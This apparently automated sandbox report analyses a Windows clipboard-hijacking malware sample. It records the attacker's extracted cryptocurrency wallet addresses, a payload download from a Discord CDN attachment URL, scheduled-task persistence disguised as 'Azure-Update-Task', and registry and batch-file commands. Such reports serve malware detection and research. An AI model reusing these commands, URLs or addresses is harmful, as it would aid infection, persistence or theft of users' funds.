{"Crypto Addresses": ["Ae2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPE", "addr1q9clx0ud02ehvzuqqtqu4tchl6g9kkzllcl2zjpan9kp39m37vlc674nwc9cqqkpe2h30l5stdv9ll3759yrmxtvrztspanadd", "bc1q7hrr7lvjrgdcskmnydwry3629c73qfx9gpk2mc", "cosmos1l8p5237wclrtqf8upw8quwuj32f30zv8gej0jc", "ltc1q0jyf5za7n5pxuz8tgvhzjkaaf5cz5kykp5cd55", "D7Dhy317Lph7ZAx4GALQtYdzcFrx35GSNK", "AYFTxSxSzjDWb2D3fs4TjjsswB41M6Tw6T", "7UT25554RQSTW2S44UVFYWZIZDWQIKUT3O7LG4QBOYDJ7IIEBVFYZZW4YI", "MFxCfYKXwLG1eM93xuNoNCzLoy7an3Ekud", "00000L0000T00MON00000000000000000000000LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ00000000000000W0000000", "D2eMjtv3Fh2EnsZ8SH4FCyvwxNawtpHDxXzBgS4sME4M", "0x4b222739496bcf2AA1F609585dACd8858943B39c", "84VKKNB6tQLam7LPn9PTdKYUfZepoYTfmMMYFEa7btqs7XMqyPWpMdq9FGSvZKsVNgDddtC5JTr1p3ACp9Cbod2f8KABjkw", "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG", "t3SCmhgjNi8B5amJUw61Tc86B9CsTTJvPy7", "TM5d5ZK4uEDe3Ry8gy35nTQLcswbHDzS95", "18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "Z18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "3JxVQHXyiwwws3Yykkw2sUbRNkgimDi725", "bnb1xw6czzmz0arvpf88ufwj4k0yfwfd8vps9f43xu", "LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ"]}
Source: 17.1.hTu8FeYy28.exe.400000.0.unpack | Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["Ae2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPE", "addr1q9clx0ud02ehvzuqqtqu4tchl6g9kkzllcl2zjpan9kp39m37vlc674nwc9cqqkpe2h30l5stdv9ll3759yrmxtvrztspanadd", "bc1q7hrr7lvjrgdcskmnydwry3629c73qfx9gpk2mc", "cosmos1l8p5237wclrtqf8upw8quwuj32f30zv8gej0jc", "ltc1q0jyf5za7n5pxuz8tgvhzjkaaf5cz5kykp5cd55", "D7Dhy317Lph7ZAx4GALQtYdzcFrx35GSNK", "AYFTxSxSzjDWb2D3fs4TjjsswB41M6Tw6T", "7UT25554RQSTW2S44UVFYWZIZDWQIKUT3O7LG4QBOYDJ7IIEBVFYZZW4YI", "MFxCfYKXwLG1eM93xuNoNCzLoy7an3Ekud", "00000L0000T00MON00000000000000000000000LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ00000000000000W0000000", "D2eMjtv3Fh2EnsZ8SH4FCyvwxNawtpHDxXzBgS4sME4M", "0x4b222739496bcf2AA1F609585dACd8858943B39c", "84VKKNB6tQLam7LPn9PTdKYUfZepoYTfmMMYFEa7btqs7XMqyPWpMdq9FGSvZKsVNgDddtC5JTr1p3ACp9Cbod2f8KABjkw", "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG", "t3SCmhgjNi8B5amJUw61Tc86B9CsTTJvPy7", "TM5d5ZK4uEDe3Ry8gy35nTQLcswbHDzS95", "18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "Z18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "3JxVQHXyiwwws3Yykkw2sUbRNkgimDi725", "bnb1xw6czzmz0arvpf88ufwj4k0yfwfd8vps9f43xu", "LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ"]} |
Source: hTu8FeYy28.exe | Virustotal: Detection: 12% | Perma Link |
Source: 17.1.hTu8FeYy28.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen |
Source: 17.2.hTu8FeYy28.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack |
Source: hTu8FeYy28.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI |
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49821 version: TLS 1.2 |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233 |
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821 |
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822 |
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com |
Source: global traffic | HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com |
Source: global traffic | HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache |
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49821 version: TLS 1.2 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401FEF OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard, | 17_2_00401FEF |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401F8B GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree, | 17_2_00401F8B |
Source: hTu8FeYy28.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI |
Source: hTu8FeYy28.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST |
Source: hTu8FeYy28.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: fodhelper.exe.17.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST |
Source: fodhelper.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe 5BC09C3C2A751169A32CF97A62765F127BCE2D0EADCE3481A6A831B6FDCC044E |
Source: hTu8FeYy28.exe | Virustotal: Detection: 12% |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Users\user\Desktop\hTu8FeYy28.exe | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | Jump to behavior |
Source: unknown | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe 'C:\Users\user\Desktop\hTu8FeYy28.exe' | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe' | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' | |
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f | |
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe' | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Mutant created: \Sessions\1\BaseNamedObjects\CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4776:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_01 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Lnouxqkbbgkvxwmwtigvjxpvnenadlc[1] | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' |
Source: classification engine | Classification label: mal92.spyw.evad.winEXE@21/8@1/1 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: hTu8FeYy28.exe | Static file information: File size 1195008 > 1048576 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R; |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 17_2_00401000 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Jump to dropped file |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe' |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 17_2_00401000 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess, | 17_2_00401272 |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 17_2_00401000 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Memory written: C:\Users\user\Desktop\hTu8FeYy28.exe base: 400000 value starts with: 4D5A | Jump to behavior |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f | Jump to behavior |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Program Manager |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progman |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: Yara match | File source: 17.2.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.2.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.1.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.1.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, type: MEMORY |